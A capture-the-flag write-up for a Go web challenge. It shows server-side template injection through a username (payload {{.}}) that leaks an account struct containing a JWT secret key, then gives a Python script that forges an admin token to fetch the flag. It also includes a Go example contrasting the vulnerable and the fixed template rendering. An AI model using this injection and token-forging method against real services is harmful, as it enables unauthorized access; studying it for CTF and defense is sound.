Tags: jwt go ssti
After analyzing the code, we notice that the application has a page that displays data entered by the user, namely the username:
```go
// the user-controlled acc.id is concatenated into the template source itself,
// so template actions inside the username are parsed and executed
template.New("").Parse("Logged in as " + acc.id)
```
Moreover, the input is not filtered in any way.
Checking for SSTI with `{{printf "%s" "ssti" }}` confirms it: the server responds with "Logged in as ssti".
Let's try `{{.}}` to dump the data structure that is passed to the template as its input.
The response to such a request is the whole struct, printed by the template engine:
```text
Logged in as {{{.}} test_password false fasdf972u1031xu90zm10Av}
```
The data structure is:
```go
type Account struct {
id string
pw string
is_admin bool
secret_key string
}
```
So we have the secret_key, and now we can forge a JWT.
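To show why the leak works and how the page should have been written, here is an added Go example (not the challenge's code) that renders the same "Logged in as" line both ways: the vulnerable form concatenates the username into the template source, the fixed form keeps the template constant and passes the username as data. The Account values are constructed samples.

```go
package main

import (
	"bytes"
	"fmt"
	"text/template"
)

// Account mirrors the struct recovered in the writeup; field values below are constructed.
type Account struct {
	id         string
	pw         string
	is_admin   bool
	secret_key string
}

// renderVulnerable reproduces the challenge pattern: acc.id becomes part of the
// template *source*, so actions like {{.}} in the username are executed against acc.
func renderVulnerable(acc Account) (string, error) {
	tmpl, err := template.New("").Parse("Logged in as " + acc.id)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := tmpl.Execute(&buf, acc); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// renderSafe keeps the template source fixed and passes only the id as data,
// so "{{.}}" in a username is printed literally and the struct is never exposed.
func renderSafe(acc Account) (string, error) {
	tmpl, err := template.New("").Parse("Logged in as {{.}}")
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := tmpl.Execute(&buf, acc.id); err != nil {
		return "", err
	}
	return buf.String(), nil
}

func main() {
	acc := Account{id: "{{.}}", pw: "test_password", is_admin: false, secret_key: "CONSTRUCTED_SECRET"}
	v, _ := renderVulnerable(acc) // Logged in as {{{.}} test_password false CONSTRUCTED_SECRET}
	s, _ := renderSafe(acc)       // Logged in as {{.}}
	fmt.Println(v)
	fmt.Println(s)
}
```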
To automate this, we write a Python script:
```python
import requests as r
import json
import jwt

host = 'http://34.146.226.125'
# the username carries the template action that dumps the Account struct
username = '{{.}}'
password = 'test_password'

# register the account and obtain a JWT for it
r.get(f'{host}/regist', {'id': username, 'pw': password})
data = r.get(f'{host}/auth', {'id': username, 'pw': password}).content.decode()
token = json.loads(data)['token']

# the "/" page renders the template; the last field of the dumped struct is secret_key
headers = {'X-Token': token}
data = r.get(f'{host}/', headers=headers).content.decode()
key = data.split()[-1][:-1]  # strip the closing "}" of the struct dump

# verify the token with the leaked key, set is_admin, and re-sign it with the same key
token = jwt.decode(token, key=key, algorithms=['HS256'])
token['id'] = 'user'
token['is_admin'] = True
token = jwt.encode(token, key=key, algorithm='HS256')

headers = {'X-Token': token}
data = r.get(f'{host}/flag', headers=headers)
print(data.content.decode())
```